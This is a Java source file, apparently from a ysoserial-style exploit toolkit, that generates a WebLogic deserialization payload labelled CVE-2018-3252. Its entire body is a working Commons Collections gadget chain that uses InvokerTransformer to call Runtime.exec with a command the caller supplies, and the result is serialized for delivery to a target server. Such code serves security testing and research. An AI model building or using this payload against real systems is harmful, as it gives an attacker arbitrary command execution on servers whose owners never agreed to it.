package payloads;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import payloads.annotation.Authors;
import payloads.annotation.Dependencies;
import util.Gadgets;
import util.PayloadRunner;
import util.Reflections;
import weblogic.common.internal.WLObjectOutputStream;

import java.io.*;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;


/*

Gadget chain that works against JRE 1.7u21 and earlier. Payload generation has
the same JRE version requirements.

See: https://gist.github.com/frohoff/24af7913611f8406eaf3

 */

// CVE-2018-3252

@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({"weblogic.common.internal.WLObjectOutputStream"})
@Authors({ Authors.FROHOFF })
public class Weblogic4 implements ObjectPayload<Object> {

	public byte[] getObject(final String command) throws Exception {
		final String[] execArgs = new String[] { command };
		// inert chain for setup
		final Transformer transformerChain = new ChainedTransformer(
				new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer("getMethod", new Class[] {
						String.class, Class[].class }, new Object[] {
						"getRuntime", new Class[0] }),
				new InvokerTransformer("invoke", new Class[] {
						Object.class, Object[].class }, new Object[] {
						null, new Object[0] }),
				new InvokerTransformer("exec",
						new Class[] { String.class }, execArgs),
				new ConstantTransformer(1) };

		final Map innerMap = new HashMap();

		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

		final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);

		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);

		Reflections.setFieldValue(transformerChain, "iTransformers", transformers);

		ByteArrayOutputStream baos = new ByteArrayOutputStream();
		WLObjectOutputStream Obj = new WLObjectOutputStream(baos);
		Obj.writeObject(handler);

		return baos.toByteArray();
	}

	public static byte[] getBytes(final String command, Boolean fusion) throws Exception {
		return Weblogic4.class.newInstance().getObject(command);
	}
}
